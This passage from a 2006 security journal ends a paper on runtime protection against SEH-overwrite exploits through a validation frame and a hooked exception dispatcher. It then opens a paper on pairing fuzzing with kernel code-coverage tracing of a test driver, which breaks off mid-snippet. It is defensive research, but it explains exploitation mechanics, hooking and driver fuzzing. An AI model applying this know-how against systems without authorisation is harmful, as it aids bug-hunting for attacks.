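 * (opcode FF /4, encoded as FF 25 imm32) that a hook would write over
 * the first instructions of ntdll!KiUserExceptionDispatcher.  The imm32
 * is the address of a pointer to the hook function, not the hook
 * function itself.  Little-endian (x86) byte order is assumed. */
void build_indirect_jmp(uint8_t out[6], uint32_t pointer_location)
{
    out[0] = 0xFF;                          /* JMP r/m32 */
    out[1] = 0x25;                          /* ModRM: [disp32] */
    memcpy(&out[2], &pointer_location, 4);  /* little-endian address */
}
```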
With the hook installed, the next step is to implement the function that will
actually validate the exception handler chain. The basic steps involved in
this are to first extract the head of the list from fs:[0] and then iterate
over each entry in the list. For each entry, the function should validate that
the Next attribute points to a valid memory location. If it does not, then the
chain can be assumed to be corrupt. However, if it does point to valid memory,
then the routine should check to see if the Next pointer is equal to the
address of the validation frame that was previously stored at the end of the
exception handler chain for this thread. If it is equal to the validation
frame, then the integrity of the chain is confirmed and the exception can be
passed to the actual exception dispatcher.
However, if the function reaches an invalid Next pointer, or it reaches
0xffffffff without encountering the validation frame, then it can assume that
the exception handler chain is corrupt. It's at this point that the function
can take whatever steps are necessary to discard the exception, log that a
potential exploitation attempt occurred, and so on. The end result should be
the termination of either the thread or the process, depending on
circumstances. This algorithm is captured by the pseudo-code below:
01: CurrentRecord = fs:[0];
02: ChainCorrupt = TRUE;
03: while (CurrentRecord != 0xffffffff) {
04: if (IsInvalidAddress(CurrentRecord->Next))
05: break;
06: if (CurrentRecord->Next == ValidationFrame) {
07: ChainCorrupt = FALSE;
08: break;
09: }
10: CurrentRecord = CurrentRecord->Next;
11: }
12: if (ChainCorrupt == TRUE)
13: ReportExploitationAttempt();
14: else
15: CallOriginalKiUserExceptionDispatcher();
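The walk over the chain can also be exercised as a small, self-contained
simulation. The structures and names below are hypothetical (a NULL check
substitutes for a real IsInvalidAddress test), but the loop itself mirrors the
algorithm just shown:

```c
#include <stdint.h>
#include <stddef.h>

/* Simulated SEH registration record; on a real 32-bit Windows thread
 * the head of this list lives at fs:[0]. */
struct reg_record {
    struct reg_record *next;     /* Next pointer; 0xffffffff terminates */
    void              *handler;
};

#define END_OF_CHAIN ((struct reg_record *)(uintptr_t)0xffffffffu)

/* Walks the chain; returns 1 if the validation frame is reached before
 * the terminator, 0 if the chain appears corrupt.  A NULL check stands
 * in for the real address-validity test. */
int chain_is_intact(struct reg_record *head,
                    struct reg_record *validation_frame)
{
    struct reg_record *cur = head;
    while (cur != END_OF_CHAIN) {
        if (cur == NULL || cur->next == NULL)
            return 0;                  /* invalid Next pointer */
        if (cur->next == validation_frame)
            return 1;                  /* chain verified intact */
        cur = cur->next;
    }
    return 0;  /* hit 0xffffffff without seeing the validation frame */
}
```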
The above algorithm describes how the exception dispatching path should be
handled. However, there is one important part remaining in order to implement
this solution. Specifically, there must be some way of registering the
validation frame with a thread prior to any exceptions being dispatched on that
thread. There are a few ways that this can be accomplished. In terms of a
proof of concept, the easiest way of doing this is to implement a DLL that,
when loaded into a process' address space, catches the creation notification of
new threads through a mechanism like DllMain or through the use of a TLS
callback in the case of a statically linked library. Both of these approaches
provide a location for the solution to establish the validation frame with the
thread early on in its execution. However, if there were ever a case where the
thread were to raise an exception prior to one of these routines being called,
then the solution would improperly detect that the exception handler chain was
corrupt.
One solution to this potential problem is to store state relative to each
thread that keeps track of whether or not the validation frame has been
registered. There are certain implications about doing this, however. First,
it could introduce a security problem in that an attacker might be able to
bypass the protection by somehow toggling the flag that tracks whether or not
the validation frame has been registered. If this flag were to be toggled off
and an exception were generated in the thread, then the solution would have
to assume that it can't validate the chain because no validation frame has been
installed. Another issue with this is that it would require some location to
store this state on a per-thread basis. A good example of a place to store
this is in TLS, but again, it has the security implications described above.
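A minimal sketch of the per-thread tracking idea follows, using C11
_Thread_local as a portable stand-in for Windows TLS (TlsAlloc/TlsSetValue);
all names here are invented for illustration:

```c
/* Hypothetical per-thread state tracking whether the validation frame
 * has been registered for the current thread.  A real Windows
 * implementation would store this via TlsAlloc/TlsSetValue; C11
 * _Thread_local keeps the sketch portable. */
static _Thread_local int validation_frame_registered;

/* Called from a DllMain/TLS-callback-style thread notification once
 * the validation frame has been appended to the chain. */
void on_thread_attach(void)
{
    validation_frame_registered = 1;
}

/* The dispatcher hook consults this before attempting validation; if
 * the frame was never registered, the chain cannot be checked. */
int can_validate_chain(void)
{
    return validation_frame_registered;
}
```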
A more invasive solution to the problem of registering the validation frame
would be to somehow layer very early on in the thread's execution -- perhaps
even before it begins executing from its entry point. The author is aware of a
good way to accomplish this, but it will be left as an exercise to the reader
on what this might be. This more invasive solution is something that would be
an easy and elegant way for Microsoft to include support for this, should they
ever choose to do so.
The final matter of how to go about implementing this solution centers around
how it could be deployed and used with existing applications without requiring
a recompile. The easiest way to do this in a proof of concept setting would be
to implement these protection mechanisms in the form of a DLL that can be
dynamically loaded into the address space of a process that is to be protected.
Once loaded, the DLL's DllMain can take care of getting everything set up. A
simple way to cause the DLL to be loaded is through the use of AppInitDLLs,
although this has some limitations. Alternatively, there are more invasive
options that can be considered that will accomplish the goal of loading and
initializing the DLL early on in process creation.
One interesting thing about this approach is that while it is targeted at being
used as a runtime solution, it can also be used as a compile-time solution.
This means that applications can use this solution at compile-time to protect
themselves from SEH overwrites. Unlike Microsoft's solution, this will even
protect them in the presence of third-party images that have not been compiled
with the support. This can be accomplished through the use of a static library
that uses TLS callbacks to receive notifications when threads are created, much
like DllMain is used for DLL implementations of this solution.
All things considered, the author believes that the implementation described
above, for all intents and purposes, is a fairly simplistic way of providing
runtime protection against SEH overwrites that has minimal overhead. While the
implementation described in this document is considered more suitable for a
proof-of-concept or application-specific solution, there are real-world
examples of more robust implementations, such as in Wehnus's WehnTrust product,
a commercial side-project of the author's. Apologies for the shameless plug.
5) Compatibility
Like most security solutions, there are always compatibility problems that must
be considered. As it relates to the solution described in this paper, there
are a couple of important things to keep in mind.
The first compatibility issue that might happen in the real world is a scenario
where an application invalidates the exception handler chain in a legitimate
fashion. The author is not currently aware of situations where an application
would legitimately need to do this, but it has been observed that some
applications, such as cygwin, will do funny things with the exception handler
chain that are not likely to play nice with this form of protection. In the
event that an application invalidates the exception handler chain, the solution
described in this paper may inadvertently detect that an SEH overwrite has
occurred simply because it is no longer able to reach the validation frame.
Another compatibility issue that may occur centers around the fact that the
implementation described in this paper relies on the hooking of functions. In
almost every situation it is a bad idea to use function hooking, but there are
often situations where there is no alternative, especially in closed source
environments. The use of function hooking can lead to compatibility problems
with other applications that also hook ntdll!KiUserExceptionDispatcher. There
may also be instances of security products that detect the hooking of
ntdll!KiUserExceptionDispatcher and classify it as malware-like behavior. In
any case, these compatibility concerns center less around the fundamental
concept and more around the specific implementation that would be required of a
third-party.
6) Conclusion
Software-based vulnerabilities are a common problem that affect a wide array of
operating systems. In some cases, these vulnerabilities can be exploited with
greater ease depending on operating system specific features. One particular
case of where this is possible is through the use of an SEH overwrite on 32-bit
applications on the Windows platform. An SEH overwrite involves overwriting the
Handler associated with an exception registration record. Once this occurs, an
exception is generated that results in the overwritten Handler being called.
As a result of this, the attacker can more easily gain control of code
execution due to the context that the exception handler is called in.
Microsoft has attempted to address the problem of SEH overwrites with
enhancements to the exception dispatcher itself and with solutions like SafeSEH
and the /GS compiler flag. However, these solutions are limited because they
require a recompilation of code and therefore only protect images that have
been compiled with these flags enabled. This limitation is something that
Microsoft is aware of and it was most likely chosen to reduce the potential for
compatibility issues.
To help solve the problem of not offering complete protection against SEH
overwrites, this paper has suggested a solution that can be used without any
code recompilation and with negligible performance overhead. The solution
involves appending a custom exception registration record, known as a
validation frame, to the end of the exception list early on in thread startup.
When an exception occurs in the context of a thread, the solution intercepts
the exception and validates the exception handler chain for the thread by
making sure that it can walk the chain until it reaches the validation frame.
If it is able to reach the validation frame, then the exception is dispatched
like normal. However, if the validation frame cannot be reached, then it is
assumed that the exception handler chain is corrupt and that it's possible that
an exploit attempt may have occurred. Since exception registration records are
always prepended to the exception handler chain, the validation frame is
guaranteed to always be the last handler.
This solution relies on the fact that when an SEH overwrite occurs, the Next
attribute is overwritten before overwriting the Handler attribute. Due to the
fact that attackers typically use the Next attribute as the location at which
to store a short jump, it is not possible for them to both retain the integrity
of the list and also use it as a location to store code. This important
consequence is the key to being able to detect and prevent the leveraging of an
SEH overwrite to gain code execution.
Looking toward the future, the usefulness of this solution will begin to wane
as 64-bit versions of Windows begin to dominate the desktop environment. The
reason 64-bit versions are not affected by this solution is because exception
handling on 64-bit versions of Windows is inherently secure due to the way it's
been implemented. However, this only applies to 64-bit binaries. Legacy
32-bit binaries that are capable of running on 64-bit versions of Windows will
continue to use the old style of exception handling, thus potentially leaving
them vulnerable to the same style of attacks depending on what compiler flags
were used. On the other hand, this solution will also become less necessary due
to the fact that modern 32-bit x86 machines support hardware NX and can
therefore help to mitigate the execution of code from the stack. Regardless of
these facts, there will always be a legacy need to protect against SEH
overwrites, and the solution described in this paper is one method of providing
that protection.
A. References
Borland. United States Patent: 5628016.
http://patft.uspto.gov/netacgi/nph-Parser?Sect1=PTO1&Sect2=HITOFF&d=PALL&p=1&u=2Fnetahtml2FPTO2Fsrchnum.htm&r=1&f=G&l=50&s1=5,628,016.PN.&OS=PN/5,628,016&RS=PN/5,628,016;
accessed Sep 5, 2006.
Litchfield, David. Defeating the Stack based Buffer
Overflow Prevention Mechanism of Microsoft Windows 2003 Server.
http://www.blackhat.com/presentations/bh-asia-03/bh-asia-03-litchfield.pdf;
accessed Sep 5, 2006.
Microsoft Corporation. Structured Exception Handling.
http://msdn.microsoft.com/library/default.asp?url=/library/en-us/debug/base/structured_exception_handling.asp;
accessed Sep 5, 2006.
Microsoft Corporation. Working with the AppInitDLLs
registry value.
http://support.microsoft.com/default.aspx?scid=kb;en-us;197571;
accessed Sep 5, 2006.
Microsoft Corporation. /GS (Buffer Security Check)
http://msdn2.microsoft.com/en-us/library/8dbf701c.aspx;
accessed Sep 5, 2006.
Nagy, Ben. SEH (Structured Exception Handling) Security
Changes in XPSP2 and 2003 SP1.
http://www.eeye.com/html/resources/newsletters/vice/VI20060830.html#vexposed;
accessed Sep 8, 2006.
Pietrek, Matt. A Crash Course on the Depths of Win32
Structured Exception Handling.
http://www.microsoft.com/msj/0197/exception/exception.aspx;
accessed Sep 8, 2006.
skape. Improving Automated Analysis of Windows x64
Binaries.
http://www.uninformed.org/?v=4&a=1&t=sumry; accessed
Sep 5, 2006.
Wehnus. WehnTrust.
http://www.wehnus.com/products.pl; accessed Sep 5,
2006.
Wikipedia. Matryoshka Doll.
http://en.wikipedia.org/wiki/Matryoshka_doll;
accessed Sep 18, 2006.
Wine. CompilerExceptionSupport.
http://wiki.winehq.org/CompilerExceptionSupport;
accessed Sep 5, 2006.

uninformed/5.3.txt
Effective Bug Discovery
9/2006
vf
vf@nologin.org
"If we knew what it was we were doing, it would not be
called research, would it?"
- Albert Einstein
1) Foreword
Abstract: Sophisticated methods are currently being developed and
implemented for mitigating the risk of exploitable bugs. The process of
researching and discovering vulnerabilities in modern code will require
changes to accommodate the shift in vulnerability mitigations. Code
coverage analysis implemented in conjunction with fuzz testing reveals
faults within a binary file that would have otherwise remained
undiscovered by either method alone. This paper suggests a research
method for more effective runtime binary analysis using the
aforementioned strategy. This study presents empirical evidence that
despite the fact that bug detection will become increasingly difficult
in the future, analysis techniques have an opportunity to evolve
intelligently.
Disclaimer: Practices and material presented within this paper are meant
for educational purposes only. The author does not suggest using this
information for methods which may be deemed unacceptable. The content in
this paper is considered to be incomplete and unfinished, and therefore
some information in this paper may be incorrect or inaccurate.
Permission to make digital or hard copies of all or part of this work
for personal or classroom use is granted without fee provided that
copies are not made or distributed for profit or commercial advantage
and that copies bear this notice and the full citation on the first
page. To copy otherwise, to republish, requires prior specific
permission.
Prerequisites: For an in-depth understanding of the concepts presented
in this paper, a familiarity with Microsoft Windows device drivers,
working with x86 assembler, debugging fundamentals, and the Windows
kernel debugger is required. A brief introduction to the current state
of code coverage analysis, including related uses, is introduced to
support information presented within this paper. However, to implement
the practices within this paper a deeper knowledge of aforementioned
vulnerability discovery methods and methodologies is required. The
following software and knowledge of its use is required to follow along
with the discussion: IDAPro, Debugging tools for Windows, Debug Stalk,
and a virtual machine such as VMware or Virtual PC.
Thanks: The author would like to thank west, icer, skape, Uninformed,
and mom.
2) Introduction
2.1) The status of vulnerability research
Researchers employ a myriad of investigative techniques in the quest for
vulnerabilities. In any case, there exists no silver bullet for the
discovery of security related software bugs, not to mention the fact
that several new security oriented kernel-mode components have recently
been integrated into Microsoft operating systems that can make
vulnerability investigations more difficult. Vista, particularly on the
64-bit edition, is integrating several mechanisms including driver
signing, Secure Bootup using a TPM hardware chip, PatchGuard,
kernel-mode integrity checks, and restricted user-mode access to . The
Vista kernel also has an improved Low Fragmentation Heap and Address
Space Layout Randomization. In earlier days, bugs were revealed via dumb
fuzzing techniques, whereas this year more complicated bugs are surfacing
that require advanced understanding of the format and its parser. Because
of this, researchers are moving toward different discovery methods, such
as intelligent, rather than dumb, testing of drivers and applications.
2.2) The problem with fuzzing
To compound the conception that these environments are becoming more
difficult to test, monolithic black box fuzz testing, while frequently
efficacious in its purpose, has a tendency to exhibit a lack of
potency. The term ``monolithic'' is included as a reference to a
comprehensive execution of the entire application or driver. Fuzzing is
often executed in an environment where the tester does not know the
internals of the binary in question. This leads to disadvantages in
which a large number of tests must be executed to get an accurate
estimate of the binary's reliability. This investigation can be a daunting
task if not implemented in a constructive manner. The test program and
data selection should ensure independence from unrelated tests or groups
of tests, thereby gaining the ability of complete coverage by reducing
dependency on specific variables and their decision branching.
Another disadvantage of monolithic black box fuzz testing is that it is
difficult to provide coverage analysis even though the testing selection
may cover the entire suite of security testing models. A further
complication in this nature of testing is of cyclic dependency causing
cyclic arguments which in turn leads to a lessening of coverage
assurance.
2.3) Expectations
This paper aims to educate the reader on the espousal of code coverage
analysis and fuzzing philosophy presented by researchers as a means to
lighten the burden of bug detection. A kernel mode device driver will be
fuzzed for bugs using a standard fuzzing method. Results from the
initial fuzzing test will be examined to determine coverage. The fuzz
testing method will be revised to accommodate coverage concerns and an
execution graph is generated to view the results of the previous
testing. A comparison is then made between the two prior testing
methods, proving how effective code coverage analysis through kernel
mode Stalking can improve fuzzing endeavors.
3) QA
Before understanding how the methodologies presented in this paper can
be used, a few simple definitions and descriptions are addressed for the
benefit of the reader.
3.1) What is code coverage?
Code coverage, as represented by a Control Flow Graph (CFG), is defined
as a measure of the exercised code within a program undergoing software
testing. For the purpose of vulnerability research, the goal is to
utilize code coverage analysis to obtain an exhaustive execution of all
possible paths through code and data flow that may be relevant for
revealing failures. It is used as a good metric in determining how a
specific set of tests can uncover numerous faults. Techniques of proper
code coverage analysis presented in this paper utilize basic
mathematical properties of graph theory by including elements such as
vertices, links and edges. Graph theory has lain somewhat dormant until
recently being utilized by computer scientists, who have subsequently
defined their own sets of vocabulary for the subject. For the sake of
research continuity and to link mathematical to computer science
definitions, the verbiage used within this paper will equate vertices to
code blocks, branches to decisions, and edges to code paths.
To support our hypothesis, the aforementioned graph theory elements are
compiled into CFGs. Informally, a Control Flow Graph is a directed graph
composed of a finite set of vertices connected by edges indicating all
possible routes a driver or application may take during execution. In
other words, a CFG is merely blocks of code whose connected flow paths
are determined by decisions. Block execution consists of a sequence of
instructions which are free of branching or other control transfers
except for the last instruction. These include branches or decisions
which consist of Boolean expressions in a control structure. A path is a
sequence of nodes traveled through by a series of uninterrupted links.
Paths enable flow of information or data through code. In our case, a
path is an execution flow and is therefore essential to measuring code
coverage. Because of this factor, this investigation focuses directly on
determining which paths have been traversed, which blocks and
correlating data have been executed, and which links have been followed,
and finally on applying these findings to fuzzing techniques.
The purpose of code coverage analysis is ultimately to require all
control decisions to be exercised. In other words, the application
needs to be executed thoroughly using enough inputs that all edges in
the graph are traversed at least once. These graphs will be represented
as diagrams in which blocks are squares, edges are lines, and paths are
colored.
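To make the metric concrete, here is a toy, hand-instrumented function (all
names invented for illustration): each basic block bumps a counter, the way a
coverage tool records block execution at runtime, and a helper reports the
fraction of blocks hit so far.

```c
/* Toy hand-instrumented function: each basic block increments its
 * counter, mimicking what a coverage tool records at runtime. */
#define NUM_BLOCKS 3
static int block_hits[NUM_BLOCKS];

int classify(int x)
{
    block_hits[0]++;            /* block 0: entry */
    if (x < 0) {
        block_hits[1]++;        /* block 1: negative branch */
        return -1;
    }
    block_hits[2]++;            /* block 2: non-negative branch */
    return 1;
}

/* Percent of blocks executed at least once across all tests so far. */
int coverage_percent(void)
{
    int covered = 0;
    for (int i = 0; i < NUM_BLOCKS; i++)
        covered += (block_hits[i] > 0);
    return covered * 100 / NUM_BLOCKS;
}
```

Running only non-negative inputs leaves block 1 unexecuted, which is exactly
the kind of gap the coverage analysis above is meant to expose.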
4) Hypothesis: Code Coverage and Fuzzing
In the security arena, fuzzing has traditionally manifested potential
security holes by throwing random garbage at a target, hoping that any
given code path will fail in the process of consuming the aforementioned
data. The possibility of execution flowing through a particular block in
code is the sum of probabilities of the conditional branches leading to
blocks. Put simply, if there are areas of code that are never
executed during typical fuzz testing, then administering code coverage
methodologies will reveal those unexecuted branches. Graphical code
coverage analysis using CFGs helps determine which code path has been
executed even without the use of symbol tables. This process allows the
tester to more easily identify branch execution, and to subsequently
design fuzz testing methods to properly attain complete code coverage.
Prior experiments driven at determining the effectiveness of code
coverage techniques identify that ensuring branch execution coverage
will improve the likelihood of discovery of binary faults.
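The point can be demonstrated with a toy "driver" routine (entirely
hypothetical) whose deep block is guarded by a 4-byte magic value: random
fuzzing essentially never reaches it, while a single format-aware input does.

```c
#include <stdint.h>
#include <stdlib.h>
#include <stddef.h>

/* Toy stand-in for an IOCTL handler: the "deep" block executes only
 * when the buffer begins with the 4-byte magic "plut". */
static int deep_block_hits;

void handle_input(const uint8_t *buf, size_t len)
{
    if (len >= 4 && buf[0] == 'p' && buf[1] == 'l' &&
        buf[2] == 'u' && buf[3] == 't')
        deep_block_hits++;   /* ~2^-32 chance per random 4-byte input */
}

/* Dumb fuzzer: random bytes with no knowledge of the input format. */
void dumb_fuzz(unsigned iterations, unsigned seed)
{
    srand(seed);
    for (unsigned i = 0; i < iterations; i++) {
        uint8_t buf[4];
        for (int j = 0; j < 4; j++)
            buf[j] = (uint8_t)(rand() & 0xff);
        handle_input(buf, sizeof buf);
    }
}
```

Coverage analysis would show the guarded block unexecuted after the dumb run,
telling the tester exactly which input structure the fuzzer must learn.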
4.1) Process and Kernel Stalking
One of the more difficult questions to answer when testing software for
vulnerabilities is: ``when is the testing considered finished?'' How do
we, as vulnerability bug hunters, know when we have completed our
testing cycle by exhausting all code paths and discovering all possible
bugs? Because fuzz testing can easily be random, and thus unpredictable, the
question of when to conclude testing is often left unanswered.
Pedram Amini, who recently released ``Paimei'', coined the term "Process
Stalking" as a set of runtime binary analysis tools intended to enhance
the visual effect of runtime analysis. His tool includes an IDA Pro
plug-in paired with GML graph files for easy viewing. His strategy
amalgamates the processes of runtime profiling through tracing and state
mapping, which is a graphic model composed of behavior states of a
binary. Pedram Amini's "Process Stalker" tool suite can be found on his
personal website (http://pedram.redhive.com) and the reverse engineering
website OpenRCE (http://www.openrce.org).
4.2) Stalking and Fuzzing Go Hand in Hand
Process Stalker was transformed by an individual into a windbg extension
for use in debugging user-mode and kernel-mode scenarios. This tool was
given the title ``Debug Stalk,'' and until now this tool has remained
unreleased. Process and Debug Stalker have overcome the static analysis
visualization setback by implementing runtime binary analysis. Runtime
analysis using Process and Debug Stalking in conjunction with
mathematically enhanced CFGs exponentially improves the bug hunting
mechanisms using fuzz techniques. Users can graphically determine via
runtime analysis which paths have not been traversed and which blocks
have not been executed. The user then has the opportunity to refine
their testing approach to one that is more effective. When testing a
large application, this technique dramatically reduces the overall
workload of said scenarios. Therefore, iterations of the Process Stalker
tool and the Debug Stalk tool will be used for investigating a faulty
driver in this paper.
Debug Stalk is a Windows debugger plug-in that can be used in places
where Process Stalking may not be suited, such as in a kernel-mode
setting.
5) Implementation
For the sake of simple illustration, several tools have been
created for testing our code coverage theories. Some of the test cases
have been exaggerated and are not real world examples. This testing
implementation is broken down into three parts: Part I includes sending
garbage to the device driver with dumb fuzzing; Part II will include
smarter fuzzing; Part III is a breakdown of how an intelligent level of
fuzzing helps improve code coverage while testing. First, a very simple
device driver named pluto.sys was created for the purpose of this paper.
It contains several blocks of code with decision based branching that
will be fuzzed. The fuzzer will send iterations of random data to
pluto.sys. After fuzzing has completed, a post-analysis tool will review
executed code blocks within the driver. Part II will contain the same
process as Part I, however, it will include an updated fuzzer based on
our Part I post-analysis that will allow the driver to call into a
previously unexecuted code region. Part III uses the data collected in
Parts I and II as an illustrative proof of the benefits of the code
coverage thesis.
5.1) Stalking Setup
Several software components need to be acquired before Stalking can
begin: the Debug Stalk extension, Pedram's Process Stalker, Python, and
the GoVisual Diagram Editor (GDE). Pedram's Stalker is listed on both
his blog and on the OpenRCE website. The Process Stalker contains files
such as the IDA Pro plug-in, and Python scripts that generate the GML
graph files that will be imported into GDE. GDE provides a functional
mechanism for editing and positioning of graphs including clustered
graphing, creation and deletion of nodes, zooming and scrolling,
and automatic graph layout. Components can be obtained at the following
locations:
GDE: http://www.oreas.com/gde_en.php
Python: http://www.python.org/download
Proc Stalker: http://www.openrce.org/downloads/details/171/Process Stalker
Debug Stalk: http://www.nologin.org/code
5.2) Installing the Stalker
A walkthrough of installation for Process Stalker and required
components will be covered briefly in this document, however, more
detailed steps and descriptions are provided in Pedram's supporting
manual. The .bpl file generated by the IDA plug-in will spit out a
breakpoint list for entries within each block. The IDA plug-in
processstalker.plw must be inserted into the IDA Pro plug-ins directory.
Restarting IDA will allow the application to load the plug-in. A
successful installation of the IDA plug-in in the log window will be
similar to the following:
[*] pStalker> Process Stalker Profiler
[*] pStalker> Pedram Amini <pedram.amini@gmail.com>
[*] pStalker> Compiled on Sep 21 2006
Generating a .bpl file can be started by pressing Alt+5 within the IDA
application. A dialog appears. Make sure that ``Enable Instruction
Colors,'' ``Enable Comments,'' and ``Allow Self Loops'' are all
selected. Pressing OK will prompt for a ``Save as'' dialog. The .bpl
file must be named relative to its given name. For example, if calc.exe
is being watched, the file name must be calc.exe.bpl. In our case,
pluto.sys is being watched, so the file name must be pluto.sys.bpl. A
successful generation of a .bpl file will produce the following output
in the log window:
[*] pStalker> Profile analysis 25% complete.
[*] pStalker> Profile analysis 50% complete.
[*] pStalker> Profile analysis 75% complete.
[*] pStalker> Profile analysis 100% complete.
Opening the pluto.sys.bpl file will show that records are colon
delimited:
pluto.sys:0000002e:0000002e
pluto.sys:0000006a:0000006a
pluto.sys:0000007c:0000007c
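A minimal sketch of consuming these records, assuming the
module:offset:offset layout shown above with hexadecimal offsets relative to
the module base (the function name is invented for illustration):

```c
#include <stdio.h>

/* Parses one colon-delimited breakpoint-list record of the form
 * "module:offset:offset" as emitted by the Process Stalker IDA plug-in.
 * Offsets are hexadecimal and relative to the module base.  Returns 1
 * on success, 0 on a malformed record. */
int parse_bpl_record(const char *line, char module[64],
                     unsigned long *start, unsigned long *end)
{
    return sscanf(line, "%63[^:]:%lx:%lx", module, start, end) == 3;
}
```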
5.3) Installing Debug Stalk
The Debug Stalk extension can be built as follows. Open the Windows
2003 Server Build Environment window. Set the DBGSDK_INC_PATH and
DBGSDK_LIB_PATH environment variables to specify the paths to the
debugger SDK headers and the debugger SDK libraries, respectively. If
the SDK is installed at c:\WINDBGSDK, the following would work:
set DBGSDK_INC_PATH=c:\WINDBGSDK\inc
set DBGSDK_LIB_PATH=c:\WINDBGSDK\lib
This may vary depending on where the SDK is installed. The directory
name must not contain a space (' ') in its path. The next step is to
change directories to the project directory. If Debug Stalk source
code is placed within the samples directory within the SDK (located
at c:\WINDBGSDK), then the following should work:
cd c:\WINDBGSDK\samples\dbgstalk-0.0.18
Type build -cg at the command line to build the Debug Stalk project.
Copy the dbgstalk.dll module from within this distribution to the root
folder of the Debugging Tools for Windows root directory. This is the
folder containing programs like cdb.exe and windbg.exe. If you have a
default installation of "Debugging tools for Windows" already installed,
the following should work:
copy dbgstalk.dll "c:\Program Files\Debugging Tools for Windows\"
The debugger plug-in should be installed at this point. It is important
to note that Debug Stalk is a fairly new tool and has some reliability
issues. It is a bit flaky, and some hacking may be necessary in order to
get it running properly.
5.4) Stalking with Kernel Debug
5.4.1) Part I
For testing purposes, a Microsoft Operating System needs to be set up
inside of a Virtual PC environment. Load the pluto.sys driver inside of
the Virtual PC and attach a debug session via Kernel Debug (kd). Once kd
is loaded and attached to a process within the Virtual Machine, Debug
Stalk can be invoked by calling "!dbgstalk.dbgstalk [switches] [.bpl
file path]" at the kd console. For example:
C:\Uninformed>kd -k com:port=\\.\pipe\woo,pipe
Microsoft (R) Windows Debugger Version 6.6.0007.5
Copyright (c) Microsoft Corporation. All rights reserved.
Opened \\.\pipe\woo
Waiting to reconnect...
Connected to Windows XP 2600 x86 compatible target, ptr64 FALSE
Kernel Debugger connection established.
Windows XP Kernel Version 2600 (Service Pack 2) UP Free x86 compatible
Product: WinNt, suite: TerminalServer SingleUserTS
Built by: 2600.xpsp_sp2_rtm.040803-2158
Kernel base = 0x804d7000 PsLoadedModuleList = 0x8055ab20
Debug session time: Sat Sep 23 14:40:24.522 2006 (GMT-7)
System Uptime: 0 days 0:06:50.610
Break instruction exception - code 80000003 (first chance)
nt!DbgBreakPointWithStatus+0x4:
804e3b25 cc int 3
kd> .reload
Connected to Windows XP 2600 x86 compatible target, ptr64 FALSE
Loading Kernel Symbols
.......................................................
Loading User Symbols
Loading unloaded module list
...........
kd> !dbgstalk.dbgstalk -o -b c:\Uninformed\pluto.sys.bpl
[*] - Entering Stalker
[*] - Break Point List.....: c:\Uninformed\pluto.sys.bpl
[*] - Breakpoint Restore...: OFF
[*] - Register Enumerate...: ON
[*] - Kernel Stalking:.....: ON
current context:
eax=00000001 ebx=ffdff980 ecx=8055192c edx=000003f8 esi=00000000 edi=f4be2de0
eip=804e3b25 esp=80550830 ebp=80550840 iopl=0 nv up ei pl nz na po nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00000202
nt!RtlpBreakWithStatusInstruction:
804e3b25 cc int 3
commands:
[m] module list [0-9] enter recorder modes
[x] stop recording [v] toggle verbosity
[q] quit/close
Once Debug Stalk is loaded, a list of commands is available to the user. A
breakdown of the command line options offered by Debug Stalk is as follows:
[m] module list
[0-9] enter recorder modes
[x] stop recording
[v] toggle verbosity
[q] quit/close
At this point, the fuzz tool needs to be executed to send random data
to the device driver. While the fuzzer is running, Debug Stalk will print out
information to kd. Pressing 'g' at the command line prompt will resume
execution of the target machine. This invocation will look something like
this:
kd> g
[*] - Recorder Opened......: pluto.sys.0
[*] - Recorder Opened......: pluto.sys-regs.0
Modload: Processing breakpoints for module pluto.sys at f7a7f000
Modload: Done. 46 of 46 breakpoints were set.
0034c883 T:00000001 [bp] f7a83000 a10020a8f7 mov eax,dword ptr [pluto+0x3000 (f7a82000)]
0034ed70 T:00000001 [bp] f7a8300e 3bc1 cmp eax,ecx
0034eded T:00000001 [bp] f7a83012 a12810a8f7 mov eax,dword ptr [pluto+0x2028 (f7a81028)]
0034ee89 T:00000001 [bp] f7a8302b e9aed1ffff jmp pluto+0x11de (f7a801de)
0034ef16 T:00000001 [bp] f7a801de 55 push ebp
0034ef93 T:00000001 [bp] f7a80219 8b45fc mov eax,dword ptr [ebp-4]
0034f03f T:00000001 [bp] f7a80253 6844646b20 push 206B6444h
0034f0cb T:00000001 [bp] f7a802a2 b980000000 mov ecx,80h
0034f148 T:00000001 [bp] f7a802ab 5f pop edi
00359086 T:00000001 [bp] f7a8006a 8b4c2408 mov ecx,dword ptr [esp+8]
0035920c T:00000001 [bp] f7a800f6 833d0420a8f700 cmp dword ptr [pluto+0x3004 (f7a82004)],0
003592a9 T:00000001 [bp] f7a8010c 8b7760 mov esi,dword ptr [edi+60h]
00359345 T:00000001 [bp] f7a80114 8b4704 mov eax,dword ptr [edi+4]
003593e1 T:00000001 [bp] f7a80122 6a10 push 10h
0035945e T:00000001 [bp] f7a80133 85c0 test eax,eax
003594eb T:00000001 [bp] f7a80147 ff7604 push dword ptr [esi+4]
00359587 T:00000001 [bp] f7a80176 8bcf mov ecx,edi
00359614 T:00000001 [bp] f7a80182 5f pop edi
0035ac5b T:00000001 [bp] f7a8002e 55 push ebp
current context:
eax=00000001 ebx=0000c271 ecx=8055192c edx=000003f8 esi=00000001 edi=291f0c30
eip=804e3b25 esp=80550830 ebp=80550840 iopl=0 nv up ei pl nz na po nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00000202
nt!RtlpBreakWithStatusInstruction:
804e3b25 cc int 3
commands:
[m] module list [0-9] enter recorder modes
[x] stop recording [v] toggle verbosity
[q] quit/close
kd> q
[*] - Exiting Stalker
q
Debug Stalk has finished stalking the points in the driver exercised by the
fuzzer. Files named "pluto.sys.0" and (optionally) "pluto.sys-regs.0" have
been saved to the current working directory.
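The recorder lines printed to kd above follow a regular shape: a timestamp, a thread ID, the [bp] tag, the breakpoint address, the opcode bytes, and the disassembly. A hypothetical sketch of pulling the hit addresses out of that console form (the on-disk format of pluto.sys.0 may differ; this only parses the text shown in this paper):

```python
import re

# Match lines like:
#   0034c883 T:00000001 [bp] f7a83000 a10020a8f7 mov eax,...
LINE = re.compile(r"^([0-9a-f]{8}) T:([0-9a-f]{8}) \[bp\] ([0-9a-f]{8})")

def parse_recorder(text):
    """Return (timestamp, thread_id, address) for each breakpoint hit."""
    hits = []
    for line in text.splitlines():
        m = LINE.match(line)
        if m:
            stamp, tid, addr = (int(g, 16) for g in m.groups())
            hits.append((stamp, tid, addr))
    return hits

sample = """0034c883 T:00000001 [bp] f7a83000 a10020a8f7 mov eax,dword ptr [pluto+0x3000]
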